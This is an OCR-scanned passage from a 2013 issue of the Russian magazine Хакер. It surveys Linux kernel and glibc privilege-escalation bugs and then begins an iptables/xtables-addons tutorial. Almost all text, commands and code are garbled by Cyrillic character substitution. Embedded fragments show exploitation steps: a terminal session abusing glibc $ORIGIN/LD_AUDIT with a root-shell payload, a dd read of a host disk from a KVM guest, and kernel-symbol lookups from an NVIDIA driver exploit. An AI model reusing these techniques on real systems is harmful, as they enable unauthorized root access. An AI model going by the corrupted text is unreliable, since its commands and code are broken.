БОГАТЫЙ 2013-Й 

Отматываем время всего на пару месяцев назад (13.03.2013) 
и видим еще один вполне осязаемый локальный гоо{-эксплойт 
(аоо.а/ВО01.) для всех ядер ветки 3.8. В этот раз проблем- 
ным оказался код, ответственный за реализацию пространств 
имен для непривилегированных пользователей. Уязви- 
мость проявлялась при использовании комбинации флагов 
СЕОМЕ_МЕМ/ЛО$ФЕВ и СЕОМЕ_Р$ во время клонирования процес- 
са, в результате чего несколько процессов, работающих в раз- 
ных пространствах имен, могли совместно использовать один 
корневой каталог. Ошибка была исправлена в 3.8.3. 

Тремя неделями ранее (25.02.2013) исследователи выяви- 
ли локальную уязвимость С\Е-2013-1763 (чоо.91МКуб0), затра- 
гивающую ядра Шпих с 3.3 по 3.8. В этот раз проблема была 
в банальном переполнении буфера в подсистеме $оск_ Чад. 
Проверка на выход за границы массива $оск_Чад_папа!ег$ 
не осуществлялась, поэтому, отправив специальным образом 
сформированное пеНтк-сообщение из пространства пользо- 


ХАКЕР 07 /174/ 2013 


вателя, можно было вызвать переполнение буфера и выполнить 
код с правами ядра. 

Код эксплойта был опубликован (900.9/у17Ма) и распро- 
странялся на такие дистрибутивы, как РГедога 17, Еедога 18, 
Обитщи 12.04 и Убити 12.10, а также на актуальную к тому мо- 
менту версию АгсИИпих и другие дистрибутивы. Однако самое 
интересное, что, по некоторым сведениям, 0-дау-эксплойт 
для данной уязвимости существовал еще с июля 2012 года, 
но распространялся только на Еедога 17 с ядрами 3.4.4-3.1С17. 
1686, 3.5.2-3.1©17.1686 и 3.5.5-2.1<17.1686. А это сотни тысяч сер- 
веров по всему миру. 

Девятью днями ранее в Шпих обнаружили любопытную 
уязвимость под индексом С\Е-2013-0871 (чоо.9/7\МХ2), 
которая могла быть использована локальным злоумышлен- 
ником для выполнения кода на уровне ядра. По заявлению 
исследователей, она существовала в подсистеме РТВАСЕ, 
однако для ее эксплуатации требовался не просто эксплойт, 
аеще и модификация ядра таким образом, чтобы спровоциро- 
вать появление эффекта гонки при вызове расе с параметром 
РТВАСЕ_ЗЕТВЕС$5. 

Справедливости ради стоит сказать, что реальность возник- 
новения этого самого эффекта гонки так никто и не подтвердил, 
однако и не опроверг. На каких архитектурах может проявляться 
проблема, также осталось невыясненным. Реальным же остал- 
ся только факт, что в последних на тот момент версиях ядра 
«уязвимости» уже не существовало. 


ИСТОРИЯ СБАГОМ В /ОЕ\У/<Р!О>/МЕМ 

Откаскада проблем 2013 года перейдем к более ранним и опас- 
ным уязвимостям, найденным в предыдущие годы жизни пинг- 
вина. Начнем, как обычно, с конца, а именно с критической 
гоо1-уязвимости, найденной в январе 2012 года. Исследователь 
Юри Аэдла в приватном порядке уведомил разработчиков ядра 
о проблеме, найденной им в интерфейсе /ргос/<ра>/тет, 
используемом для получения и модификации информации 
о памяти процесса. Как оказалось, проверка прав на запись 
делалась криво, в результате чего при определенных условиях 
любой процесс мог писать в память любого другого процесса 
(даже с $УЮ-правами) и, как следствие, внедрить в него $Пе!- 
код, который, отработав, даст права гос\. 

Однако интересна в этой истории вовсе не глупость ошибки, 
а то, как она была исправлена. Все дело в том, что разрабы от- 
реагировали на сообщение очень быстро и сразу внесли необ- 
ходимые исправления в общедоступный Ой-репозиторий ядра 
Чпих. А взломщики отреагировали еще быстрее и на основе 
внесенных изменений разобрали суть проблемы и выпустили 
сразу несколько эксплойтов (в том числе для получения го 
на Апагоа). В результате, несмотря на внесенные исправления, 
эксплойты появились раньше официального обновления ядра 
и внесения изменений в дистрибутивы. 

Впрочем, дистрибутивостроители также не заставили себя 
ждать, и багфиксы для Убити 11.1 и ВНЕЁ 6 были внесены в ре- 
позитории в тот же день. Более того, как выяснилось, ВНЕЁ 6 
и другие дистрибутивы с включенными по умолчанию техноло- 
гиями рандомизации адресного пространства АЗЁВ и РИЕ во- 
обще оказались не подвержены данному типу атаки. Если быть 
точным, эксплойт не срабатывал только в отношении ЗУЮ- 
бинарников, поставляемых с дистрибутивом, но, если админ 
самостоятельно собрал 5\Ю-приложение без опции поддерж- 
ки РЕ и оставил его в системе, взломщик смог бы использовать 
его для атаки. Проблема была исправлена в ядрах 3.0.18 и 3.2. 


В ГОСТЯХ ХОРОШО, АДОМА... 

В конце 2011 года в ядре был обнаружен другой тип бага, не от- 
носящийся к получению прав гос\, но опасный по своей приро- 
де. Речь идет о драйвере м!ю, который предназначен для про- 
броса реальных дисковых накопителей и разделов внутрь 
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виртуальных окружений. Здесь проблема оказалась уж совсем 
банальной, так как выяснилось, что драйвер уййо пропускает 
$С$!-команды через юс1-вызов З@_1О к блочному устройству 
вообще без каких-либо проверок. Поэтому, имея права гост 
в гостевом окружении, куда проброшен один из разделов хост- 
системы, можно без проблем получить доступ ко всему диску 
как на чтение, так и на запись. Например, чтобы сделать дамп 
боФ{-сектора, достаточно отдать такую команду: 


$ в аа 1+=/аем/у4а 61К_$#10=1 65$=512 сочп=1 «= 
оф=оцри{ 


В результате будет прочитан первый блок всего диска. Дру- 
гими словами, если К\/М-окружения используются для изо- 
ляции сетевых сервисов от хост-системы и одно из них будет 
поломано, под угрозой окажется вообще весь сервер. Прием 
отлично работает в К\УМ-окружениях, но неработоспособен 
в Хеп, где вызов 5@_10 не поддерживается. Чтобы решить 


Разработчики отреагировали на баг и сразу внесли исправления в СЁ-репози- 
торий, но взломшики оказались быстрее — на основе внесенных изменений 
выпустили сразу несколько эксплойтов еще до официального патча ядра! 


6 Отхога 


Если мифическая уязвимость в РТВАСЕ 
не кажется тебе чем-то абсурдным, 

то как насчет ошибки, которая в прямом 
смысле выводит из строя ноутбук? 


проблему, в ядро был добавлен отдельный ос{-вызов $С$1_ 
ЫК ста _юс{, запрещающий проброс ЗСЗ! юсН для разделов 
и вводящий белый список для ограничения области действия 
некоторых операций. 


УГРОЗА ОТ 9$В-СТИКА 

Другая интересная уязвимость была найдена в марте 2011 года 
в драйвере для звуковых плат Маме пугитет$. Как выясни- 
лось, драйвер содержит примитивнейшую из всех возможных 
ошибку, связанную с использованием небезопасной функции 
Зсру() для копирования имени устройства. При подключении 
Ц$В-девайса с длиной имени, превышающей 80 символов, 
происходит переполнение буфера и, как следствие, затирание 
соседнего участка памяти. 

Для эксплуатации уязвимости злоумышленник может ис- 
пользовать специальное программируемое У$В-устройство 
на базе микроконтроллеров серии АТЭОЦЗВ или АТМЕСАЗ214, 
которое будет прикидываться устройством МаНуе тзгитет$ 
и содержать в своем имени 80 случайных символов, за ко- 
торыми следует зпе!-код. При втыкании такого устройства 
в ЧУЗВ-порт система автоматически загрузит в ядро уязвимый 
драйвер, в котором при чтении строки имени произойдет пе- 
реполнение и будет выполнен $Пе!-код, с помощью которого, 
например, может быть открыт бэкдор или выполнено любое 
другое действие. Ошибка была исправлена в версии ядра 
р. 0..5: 

Примечательно, что с идеей подобного устройства еще 
за месяц до того выступил Джон Лаример из подразделения 
ВМ Х-Рогсе. Однако его метод основывался на эксплуатации 
системы через функции автоматического запуска и индексации 
программ файловым менеджером десктоп-окружений, и он вы- 
сказал сомнение, что то же самое можно сделать, используя 
ошибку в драйвере устройства. 


ЧЕРЕЗ 00$ КВООТ 

7 декабря 2010 года Ден Розенберг, консультант по безопас- 
ности компании \/тиа! Зесищу Везеагсй, опубликовал в мейл- 
листе Ри! О1$созиге весьма интересный концепт эксплойта, 
который использует в своей основе не классические перепол- 
нение, срыв стека или ненадлежащую проверку прав доступа, а, 
как это ни странно, три различные и на вид совсем не страшные 
)о$-уязвимости в ядре. 

В качестве базы для эксплойта использована уязвимость 
С\Е-2010-4258 (чоо.а/оС\\/2г), которая позволяет при гене- 
рации сбойного события, такого как ООРЗ$ в ядре, поместить 
в нужный участок ядра символ МИШЕ. Уязвимости С\Е-2010- 
3849 (доо.а/Аао\М/С) и С\Е-2010-3850 (доо.аИ/\ИЗеА), в свою 
очередь, используются для создания события ООР$ и после- 
дующей передачи управления по нужному адресу в ядре с по- 
мощью разыменования МУШ-указателя, предварительно раз- 
мещенного с помощью первой уязвимости. 

Интересно также, что, несмотря на актуальность первой 
уязвимости, к моменту публикации эксплойта две другие уже 
были давно закрыты. Однако, по словам автора, это не пробле- 
ма, так как ошибки, приводящие ядро к состоянию ООР$, на- 
ходятся постоянно. Тем более что эксплойт был успешно про- 
тестирован в Убими 10.04 и 10.10. 


ИНОГДАОНИ ВОЗВРАЩАЮТСЯ 

Один из самых курьезных случаев с обнаружением уязвимо- 
сти в ядре произошел немного раньше — в октябре 2010 года, 
когда в 64-битных сборках Ипих была обнаружена проблема 
с трансляцией 32-битных вызовов, которая могла привести 
к получению гоо{. Проблема связана с некорректной работой 
с регистрами и сама по себе не столь интересна. Примеча- 
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тельнее то, что та же самая дыра уже была найдена ажтри года 
назад. 

Бен Хоукс, обнаруживший проблему в 2007 году, спустя 
почти три года заметил, что фикс, изначально наложенный 
на ядро для исправления уязвимости, на самом деле был 
позднее исправлен в связи с падением производительности. 
А новая версия фикса, как оказалось, легко обходится. Испра- 
вив изначальный эксплойт, Бен вновь добился его работоспо- 
собности на всех ядрах, выпущенных за последние три года, 
доказав таким образом уязвимость огромного количества 
машин. 

Но история не была бы столь интересной, если бы не по- 
явившийся чуть позже в рассылке Ри! О15созиге эксплойт 
АВИм..с, предназначенный для проверки систем на уязвимость. 
Дело в том, что при запуске эксплойт позволял-таки получить 
гооТ, но после этого внедрял в память ядра черный ход, через 
который злоумышленники могли без всяких проблем влезть 
на машину. 


УГРОЗА ИКС 
Немногим ранее, в сентябре 2010 года, была обнаружена дру- 
гая, не так тесно связанная именно с ядром Мпих уязвимость. 
По сути, проблемными оказались как Х-сервер, так и ядро. 
Принцип атаки состоял в следующем: находилось непривиле- 
гированное иксовое приложение, содержащее уязвимость (а 
таких реально много), и доводилось до состояния бесконечно- 
го потребления памяти сервера через расширение МП-$НМ. 
Далее приложение создавало сегмент $, который оказывался 
прямо над стеком сервера, а сам сервер получал инструкцию 
выполнения рекурсивной функции, что приводило к расшире- 
нию стека и смещению его указателя в адресное пространство 
того самого сегмента $. Далее в сегмент происходила запись, 
в результате чего содержимое стека менялось и злоумышлен- 
ник получал возможность исполнить произвольный код. 
Интересно, что как таковой уязвимости Х-сервера тут, 
по сути, не было, а проблему вызывало именно ядро, которое 
по каким-то причинам реагировало на столь дикие извращения 
с сегментами уже после того, как происходила атака. Другими 
словами, сначала злоумышленник получал гост, а через мгно- 


/* Малкы врепфег... */ 
поте №079 де Кегпе1_эую{свпаг *паве) 


ЕЛЕ =Е: 

ип топе ото а99г; 
спаг диву: 

паг чпаае [512]; 
эепьсе ифыпаие мег; 
Е ге; 

Е гер = 8; 

Е ое = 0; 


Г = Гореп{“ Ургос ка увы", "г; 
ЕЕ == М) 
Г = Гореп Г” Ургос кую", бег}; 
ЕО == М) 
ое Га ЬаеЕ; 
оф = 1: 


герва{! 
ге = @; 
Пе {геЕ != ВОР) { 
А 
ге = Рэсапе[Е, “р №5 З5\л”, (уе ** од г, БФовву, эпаве); 
21а 
геё = Ресайе (Е, “Ур №5\л“, (мо + г, паве); 
1 |геЕ == 2] 1 
спаг *р: 
1 утесе паве, “Ир || эегзег левее, “5.” 
сопли; 
р = 5 егебгпаюе, '_*}; 


$ ПЕ" итриИехкр |911 


$ п Литиртд /4триехр о И фагде+ 
$ ехес 3< /тр/Иехр1о 14 /фагое* 


$ 1$ -1 Иргоси$$/т9/З 


1е-х------ 1 15150 8130 64 ОсЁ 15 89:21 /реос/18836/Т9/3 -> /#тр/ехр1 014 /+агое* 


$ гп -РР Ибир/ехр1 01, 
$ 15 -1 Иргос ии т! 3 


Ле=х====== ] {2150 Таузо 64 Ост 15 89:21 Иргос/1ВВЗБИТО/З =» /бтпрИехрПо И агоет Где1ее0} 


$ саЁ > рау1оа9.с 


у019 __а ге 1Бифе__(Гсопефгосфог 1 пм) 


{ 

зати1( В}! 

зуз феи “ИБ1п/Базв”); 
} 
0 


$ 9ес -ы -1Р1С -зНагед -о /4тр/ехр\01* рзу]о2а9.с 


$ 15 -1 Утр/Иехр1о14 


=Гшхгых-=-= 1 Тау1зо Таму!зо 4.2К ОсЕ 15 89:22 Мпо/ехр1о 1 
$ (О_АУОГТ =". $0РТО1Н" ехес Ургос/ееРИРО/З 


51А-4,.18 ыпоат1 
гоо1 
А-а. 1# 14 


и19=В(гоо*} 919=588(+ам150) 
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вение уже падал Х-сервер по исключению $1@$ЗЕС\, которое 
в нормальной ситуации должно происходить сразу. Проблему 
исправили в ядрах версий 2.6.32.19, 2.6.34.4, 2.6.35.2 (оказа- 
лось, разработчики ЗУЗЕ Мпих присылали точно такой же патч 
в список рассылки ядра аж в 2004 году, но его почему-то от- 


ко 


вергли). 

МТИТИ` 
НЕТОЛЬКО ЯДРО 
Серьезные уязвимости, угрожающие большому количеству си- Увлекательная детек- 
стем, находят не только в ядре. Опасность заключается также тивная история о поиске 


в библиотеке СМИ Шбс, которая, как и ядро, присутствует в лю- бага в /Чем/<р>/тет: 
бом дистрибутиве. В разное время в ней было найдено доста- 
точно большое количество проблем, а в октябре 2010 года так 
и вообще целая куча. 

Сначала был найден способ убитьлюбой сетевой ЕТР-сервер 


через дурацкую уязвимость в функции 9106(), которая исполь- 


Подробное описание ] А (Х 
проблемы совместимо- у 


стив 64-битном ядре: 


зуется для сравнения списка файлов с шаблоном. Как оказа- 
лось, проверка на длину пути в функции осуществляется только 
для реально существующих файлов, но если передать функции 
строку, содержащую шаблон, адресующий заведомо несуще- 
ствующие файлы (например, «/../*/../*строка»), то можно за- 
просто исчерпать всю доступную процессу память и уронить 
его. Проблема затронула почти все ЕТР-серверы, работающие 
под управлением таких систем, как ОрепВ$О 4.7, МеаВЗО 5.0.2, 
РееВЗО 7.3 / 8.1, Огасе Зип Зоап$ 10 и Ипих (проблема была 
найдена почти во всех реализациях библиотеки Пс). 

Через пару недель была доказана возможность эксплуа- 
тации известной ранее недоработки в коде библиотеки, что 
до этого считалось просто неосуществимым. Библиотека ас 
игнорировала требования спецификации ЕЁ по запрещению 
использования текущего пути к исполняемому файлу ($ОН@М) 
в процессе динамического связывания программ с идентифи- 
катором смены владельца или группы (ЗУ1/$СО). Поэтому, 
используя хитрую последовательность действий, можно подсу- 
нуть ЗУ Ю-приложению подставную библиотеку, в коде которой 
происходит открытие гоф{-шелла. С другой стороны, восполь- 
зоваться уязвимостью можно лишь в системе, где непривиле- 
гированному пользователю доступен на запись каталог, распо- 
ложенный на том же разделе, что и 5\Ю-бинарник (например, 
когда /\тр и /5Ыт в одной файловой системе). 

Данная уязвимость была выявлена только в системах АНЕ|, 
Редога и СетО$, однако спустя несколько дней был предложен 
несколько измененный метод атаки, который срабатывал также 
в Беап/УБити и других Ипих-дистрибутивах, использующих 
Ос 2.4 или более позднюю версию. При этом Ореп\Ма! и АЁТ 
/пих устояли за счет использования повышающего безопас- 
ность патча запте-епу. 


ТАКЛИ ВСЕ ПЛОХО? 
Как и в любой сложной системе, дыры в Мпих находят посто- 
янно, а различные Во$-уязвимости так и вообще открываются 


УБИВАЮЩИЙ НОУТБУКИ 


Если мифическая уязвимость в РТВАСЕ не ка- 
жется тебе чем-то абсурдным, то как насчет 
ошибки, которая в прямом смысле выводит 
из строя ноутбук? Если попробовать загру- 
зить Ипих с УЗВ Назй на ноутбуках Затзипа 
МРЗООЕЗС, МР70075С, МР70077С, МР5ЗОЧЗС 
или М№Р9О0Х4С, то устройство превратится 
в кирпич, и спасение только одно — обратиться 
в сервисный центр. 

Как оказалось, причиной ошибки стало 
поведение драйвера затзипд-!артор, для ко- 
торого вскоре был выпущен патч, вошедший 
в следующие версии ядра Шпих (3.0.62, 3.4.29 
и 3.7.6). И хотя позже сама компания Затзипа 
заявила, что проблема не в драйвере, а в ЦЕР-- 
прошивке, на других системах проблема все- 
таки не проявлялась. 


НЕРАСТОРОПНАЯ М\МОЛА 


Уязвимость могут найти не только в самом 
ядре, но и, например, в проприетарных драйве- 
рах. Так, в августе 2012 года появилась инфор- 
мация о наличии в драйвере ММГЛА незакрытой 
уязвимости, которую можно легко использо- 
вать для получения гоо{ с помощью опублико- 
ванного эксплойта. 

Интересно в этой ситуации то, что аноним- 
ный автор эксплойта сообщил ММГИА о наличии 
дыры еще за месяц до его публикации, но, так 


целыми пачками. Запредельно страшного в этом ничего нет, и и не дождавшись ответа, отдал эксплойт раз- 
так как практически все уязвимости носят локальный характер, Код эксплойта свне- работчику ядра из ще! Сам принцип работы 
поэтому, если регулярно ставить обновки для ядра и сетевых дренным бэкдором эксплойта также оказался не совсем тривиаль- 
сервисов, риск оказаться поломанным будет минимальным. действительно ным. Используя интерфейс /ае\у/пма!а0, пред- 
А пользователям домашних систем, 90% которых вообще нахо- выглядит нарочно за- назначенный для изменения параметров \УСА- 
дятся за МАТ’ом, так и волноваться даже нечего. = путанным окна (область, отведенная под видеопамять), 


эксплойт начинает передвигать окно в памяти 
до тех пор, пока оно не окажется в районе па- 
мяти ядра, после чего перезаписывает этот 
участок зПе|-кодом. 


__рррр_+ео99еут9 ("$$$ сВтру+Эг 12 аду1г“1пд пЭш +4г93%*...\п"); 
51геру(тарбу{, “/Боо{/Зузфет, тар-"}; 
51гса{ (тарби!, Кге]еа5е); 


дупап4п1 1 аБеодеугАгу* .5е11пих_орз 

дупап + п 1 1 аБеодеуе{Агу* . димту_зесиг 1у_орз 
дупап+4п1 1 аБеодеугАгу* . сараб 1 1 1+у_орз 
дуло Ап 1 ] аБеодеуг *Агу*. 52] 1пих_ептогс {по 
дуп9пт Ап 1 1 абеодеуг Агу* . ац091{_епаб1е9 


де+_эут_ех(ЗЕЕТНИУХ_О0Р5, тарБиф, 1); 
де*_=ут_ех (СУММУ _5ЕСУЮ1ТУ_ОР5, тарбит, 1); 
де+_эут_ех(САЯРЯВ -1ТУ_0Р5, тарьыт, 1); 
де*_эут_ех(5ЕСТНУХ_ЕНРЕОЮСТНб, тарбит, 1) 
дет_зут_ех(НУОТТ_ЕНАВЬЕО, тарбит, 1} 


нининии 


БАГ В СИСТЕМЕ ООЕМ 


Одна из самых глупых уязвимостей была най- 
дена не в ядре Ипиох, а в системе иадех. Выяс- 
нилось, что до версии 1.4.1 идеу не проверял 
отправителя сообщения, которым должно было 
быть ядро, и поэтому любой юзер мог сгене- 
рировать любые системные события, связан- 
ные с подключением/отключением устройств. 
Забавно, что та же проблема обнаружилась 
ивАпагога, хотя идеу там нет и в помине. 


ТРО! дупла 401 1аБеодеуе А гу* .5е11пих_орз |1 
| дупап* ап] 1 абеддеугАгу* . дитту_зесиг1Фу_орз || 
| Зуп4о Ап] ] аБеддеугВгу* .сараб1114у_орз || 
1 дупап ап] 1 абеддеугА"уе . зе] 1пих_ептогс1по |1 
| Чуп4п Ап] ] аБеддеуе В гу .ац91+_епаБ ед) 
гефигп НИСЬ; 


гефугп &0упап Ап] | абеодеуг А гут; 
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НОВЫЕ И МАЛОИЗВЕСТНЫЕ 
ВОЗМОЖНОСТИ |РТАВЕЕЗ 


Бьюсь об заклад, ты не используешь пла е$ 

на полную катушку. Между тем его возможности 
растут из года в год, появляются все новые и новые 
фичи... Не пора ли освежить твои знания о нем? 


ВВЕДЕНИЕ 

|рфафе$, точнее, пеКег/рта Ме — мощная инфраструктура 
для управления прохождением пакетов в Мпих. Некоторые на- 
зывают ее брандмауэром, но я склонен считать, что это нечто 
большее, чем сетевой экран. 

Данный фреймворк впервые появился в ядре 2.3, заменив 
собой предыдущий сетевой экран, рспа$з, и ввел новый уро- 
вень абстракции — таблицы. В современном пе Кег их суще- 
ствует пять: 


У 


Роман Ярыженко 


готтапю@уапдех.ги 


гам/ — «сырая» таблица; применяется в пе Кег самой пер- 
вой — еще даже до прохождения подсистемы отслеживания 
пакетов (соптщгаск). Используется в основном для того, что- 
бы отключить в высоконагруженных системах упомянутую 
подсистему для отдельных потоков данных с целью снизить 
нагрузку; 

таблица тапа/е используется для изменения некоторых по- 
лей в заголовке (таких, например, как ТТЁ или ТО$), а также 
для маркировки пакетов с целью последующего использо- 
вания меток, например в маршрутизации; 

таблица па{ — используется для трансляции адресов и ма- 
скарадинга; 

ЯКег — собственно и есть таблица того, что обычно называ- 
ется брандмауэром. Могут фильтроваться как входящие/ 
исходящие, так и «проходящие» пакеты — если компьютер 
используется в качестве роутера; 

зесийу — таблица, которая используется при включении 
системы МАС (например, ЗЕИпих). Правила в ней применя- 
ются после прохождения таблицы Я[ег. 
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Но помимо всего прочего, эта инфраструктура расширяе- 
мая — то есть существует множество модулей для пеКег, и не- 
которые из них — наиболее, на мой взгляд, интересные — будут 
описаны далее. Также опишуя и их применение. Наконец, будут 
упомянуты фронтенды, которые позволяют упростить конфигу- 
рирование всего этого добра. 


ХТАВЕЕ$ -АБООМ$ 

Наиболее известный набор дополнений к рфаШе$, пожалуй, 

жа е$-а44оп$. Этот набор является своего рода «наследни- 

ком» расп-о-тайс — главное отличие от последнего заключа- 
ется в том, что для установки жа е$-аЧ4оп$ не требуется пат- 
чить ядро и рфае$. Перечислю наиболее интересные модули 

и возможности, которые он добавляет (описывается Убита 

12.04, поскольку в 12.10 на ядрах 3.5." из-за добавления новых 

флагов в функцию руб _Нпа_ паг) один из модулей не компили- 

руется): 

. ХЕ деор — позволяет определять страну данного 1Р-адреса. 
Разумеется, это не панацея от различных ботнетов и базу 
адресов время от времени надо обновлять, но модуль тем 
не менее полезен. К сожалению, данный модуль нормально 
работает только под ОрепЗИ$Е, поэтому его мы будем рас- 
сматривать в рамках дистрибутива-хамелеона; 

. ХЕ трр2р — позволяет производить действия над некоторым 
Р2Р-трафиком; 

. ХЕ ркпоск — позволяет использовать рой кпоскто. Этот ме- 
ханизм позволяет держать порты закрытыми и открывать их 
только после определенной последовательности подключе- 
ний на (также закрытые) порты; 

. ХЕ |5$сап — отслеживает попытки сканирования. 


Установка этого пакета в ЧУбищи 12.04 достаточно проста: 


$ зидо арЕ-веф 1п5%а11 х+аб1е$з-а4оп$ - сомтоп 
В случае с Ореп0$Е используется аналогичная команда: 


$ зидо хуррег 1п х*+аб1е$-аа4оп$ 


Поскольку этот пакет содержит модули ядра, а оно имеет свой- 
ство обновляться, в Убищи используется ОКМ$ — поэтому 
при установке модули компилируются, что занимает время. 

Стоит рассмотреть некоторые возможности данного пакета 
поподробнее. 


ХТ СЕО!Р 

Как я уже говорил, этот модуль используется для определе- 
ния, какой стране принадлежит тот или иной айпишник. Са- 
мое, пожалуй, популярное применение данного модуля — за- 
щита от атак ботов из Китая. Однако, чтобы применять этот 
модуль, необходимо иметь базу данных подсетей по странам. 
В Ореп5($Е она уже есть, так что обновлять ли ее вручную или 
нет — решай сам. Для ее получения в составе пакета жаез- 
аадоп$ есть два скрипта. Мы сейчас их запустим, но перед при- 
менением нужно поставить еще один пакет. 


С /ч5г/5Паге/х*_вео1р 

гуррег 1п рег1-Техе-С5$\_Х$ 
/ч5г/116/хЕаб1ез -ааоп$/х+_вео1р_а1 
/ч5г/116/хЕаб1е5-аЧ4оп$/х{_вео1р_Би11а < «= 
беоТРСоипгуИПо1$ .с$\М 

/ч5г/116/хЕаб1е5 -аЧ4оп$/х{_вео1р_Би11а < «= 
беотТР\б. с$\ 


+ ++ 


ыы 


Первой командой переходим в каталог, где, собственно, 
и хранится база, вторая команда устанавливает модуль Реп, 
третья скачивает файлы с диапазонами айпишников (как 4-Й, 
так и 6-й версии), а две последние преобразуют С$\ в понят- 
ный модулю СеоР-формат. 

Но как именно его применять? Предположим, тебе необ- 
ходимо разрешить доступ только с адресов России. Команды 
для этого будут выглядеть так (здесь и далее предполагается, 
что ты пишешь все правила «с чистого листа» и что политика 
по умолчанию в таблице ЯКег — ОРОР): 


# 1рфаб1ез -А ТМРИОТ -т вео1р --згс-сс ВУ -3) АССЕРТ 
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У Терминал - гот@гот-дезКор: - - +х 


В Прика ВАд Терынах Переход Очика 


х{_ ГОСМАКК. Ко: 
Випп1п8 тоди]е уег51оп зап1фу сВеск. 
- Ог1р1па1 тоди]е 
- № ог1я1та1 тоди]е ех15{$ м1&Р1п {11$ Кегпе1 
- Тп5фа Па*{1оп 
- тута атя {о /115/тоди1е5/3.2.0-33-вепег1с/ирдате$ /9Кт$/ 


х{_15сап.Ко: 
Випп1пя тоди]е уег$1оп зап1фу сВеск. 
- Ог181па1 тоди]е 
- № ог11та1 моди]е ех151$ м1{Рат 1115$ Кегпе] 
- тзтаПат1оп 
- ТазтаЛоя 10 /116/тюди]1е$/3.2.0-33-депег1с/ирдате$/9Кт$ / 


деряюд...... 


ОКМ$: 1п5{а1] сотр1етхед. 

Обрабатываются триггеры для 116с-Б1тп ... 

]19соп{18 де{феггед ргосе$$1п8 пом ХаК1пр р]асе 

/561п/19соп#18.геа]: /и$г/]оса1/116/116$19с++.50.6.0.17-846.ру не является ЕЁЕ-ф 
айлом — у него в начале неправильные волшебные байты. 


готегот-дезКфор:-$ 1 > 


Тормиенал  преферяь бетАлЕр * ‘115 оЗдоть 147 Зое 


Установка фол брак» Вид ерыаныя Грека Строка 
СОМ ТИ (17 1о- *сс 11}; 


жаыЫе$-аа4оп$ соот И 


, 
$ (бес Бесс воде табл, Зр, ©, поде-есошил)} { 
гои_гезЯ эпох 11 
темы 1430-х & ТОР М): 
| 
} 


иси.теза миЗось }: 
таит Мое в к! 06011: 
|) 


ОНО ЗИ кофр жи отесиео суси ЧСГост иж рая *раг 
т 

ФЕРЫСХ в еозр масок Бо *1л о © раг- вас 40; 

ЕГЫХ1 бор соисгу Вегие] *пофе! 


Ма Ца 11: 
992 (1 * 0; | = пис ьсеии; 1*+) ( 
воде # Ипа одет -СС1, прое бы 1] ): 
{Г сов = мА) 4 
обе * © 284 лоб (( сл 94 ом *) ини аримов 1] ме, 
иИАааео (рае + >11) › 
$1 (15 19(леде 1 { 


реликвия 
хде: чае 10 1024 °ис\с* 10 везогу: 14 л*, 
СОКИ Ге, РИВА, }; 
теист РТК кове 
› 
› 


{* отисие ие Че воюзлеца розтеег 1940-м (1 ] жи 
* а рог то Фе поде”в Бега] расе игостыге, 

* Ту эн чемспих 196 в по т Че вс) ма 
* беччгоус) Пете. 

.’ 


Исходный код одного 
измодулей жаЫез$- 
аааоп$ } 


ибо-маен [1 } .Мегте] * 204 


Аналогичная опция '--4$1{-сс' действует для адреса назначе- 
ния (естественно, для входящего трафика эта опция бесполез- 
на). Применять эту опцию болышого смысла не вижу — главным 
образом из-за широкой распространенности межсайтового 
взаимодействия. 


ХТ 1РР2Р 

Данный модуль используется для действий с трафиком Р2Р — 
если точнее, то с отдельными пакетами. Чтобы отслеживать 
соединение Р2Р целиком, используй этот модуль вместе 
с СОМММААК. Опции рта е$ (при '-т рр2р"): 

.[ --@ЧК — соответствует протоколу еПопкеу; 

.[ --Кагаа — протоколу КаГадА; 

. --ОЙ — ВИТотег. 


Чтобы не быть голословным, приведу пример запрещения 
ВИТотет-соединения на шлюзе. 


# 1рфаб1ез -Е тапё1е -А РВЕКОЧТТМб -) СОМММАВК => 
- -ге$оге-тагкК 


# 1рфаб1е5$ -Е тап21е -А РКЕКОЦТТМб -т магКк ! <= 
--тагк 0 -) КЕТУВМ 

# 1рфаб1е5$ -Е тмап21е -А РКЕКОЧТТМс -т 1рр2р += 
--61Е -) МАВК --зе*{-тагк 1 

# 1рфаб1е$ -Е тапё1е -А РКЕКОЧТТМс -м тагК <> 
--тагк 1 -) СОМММАВК --зауе-тагк 

# 1рфаб1ез -А РОКМАКО -т магК --тагКк 1 -) ОКОР 


АА 


Официальный сайт 
ра ез: пеНКег. ога 


Разберем, что делает эта цепочка правил. Модуль рр2р 
определяет трафик Р?Р по индивидуальным пакетам. И все бы 
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хорошо, но есть одна загвоздка — в отдельно взятом пакете мо- 
жет и не быть такой информации. Но нам-то надо отмечать все 
пакеты! Для этого мы используем метку соединения. Первое 
правило копирует метку соединения в метки пакетов, второе 
правило смотрит, является ли пакет маркированным, и если 
да, то прекращает его дальнейшую обработку, третье как раз 
и маркирует пакеты ВИТоггетт, четвертое отображает метку па- 
кета на все соединения, и последнее правило запрещает все 
пакеты с меткой, установленной ранее. 

Примерно так же можно и шейпить трафик Р2Р — только 
вместо последнего правила ты пишешь правила для утилиты {Сс. 


ХТ РКМОСК 

Модуль хЕ ркпоск используется для рой Кпоскпо’а. Что это 
такое? Допустим, у тебя на интерфейсе, который смотрит в ин- 
тернет, есть только порт ЭЗН. Но твоей паранойе и этого не- 
достаточно. С другой стороны, тебе этим компьютером надо 
управлять, так что просто отключить ЭЗН — не вариант. На по- 
мощь приходит рой кКпоскто. Ты закрываешь порт, но есть 
возможность его открыть с помощью последовательных со- 
единений на определенные порты или используя ЭРА (Зтае 
Раск& Ащпепйсайоп — метод криптографической аутентифи- 
кации, в случае с х{_ркпоск берется НМАС оттекущего времени 
и адреса аутентифицируемого). ХЕ ркпоск поддерживает оба 
режима, однако второй мы рассматривать не будем — его при- 
менение довольно специфично. 

Приведу пример для открытия порта $$Н: 


# 1рфаб1ез -А ТМРОТ -р ср -тм рКпоск --Кпоскроге$ += 
4002 ,31337,2195 --5Ег1сЕ --паме $5$Н --Е1те 30 += 
--аифос1о$е 5 --ароге 22 -] АССЕРТ 


ы Терминал - гос гогт- вез Кор: Розе Кага хе еоер -+х 


Файл Правка Вид Терминал Переход Справка 
ТРУ гапяез Тог М2 гБека тат =] 
ТРуё гапрез Рог МА НОШу 5ее (УатЕсап С1у 5тате) 
ТРуф гапаез Рог УА НО1у 5ее (Уаттсап СШфу 5тате) 
ТРуб гапяезх Гог УС сашпе Узлеепе ап9 Ее Сгепад лез 
ТРуф гапре$ Ког УС ба1пе Узлеепе ап9 ФАе сгепад лез 
1Руб гапрезь Рог УЕ УМепехие1а 

ТРУ4 гапие5 Тог УЕ Мепетие1а 

ТРуб гапаех Гог УТ УЕеяал 151195, Ц.5. 

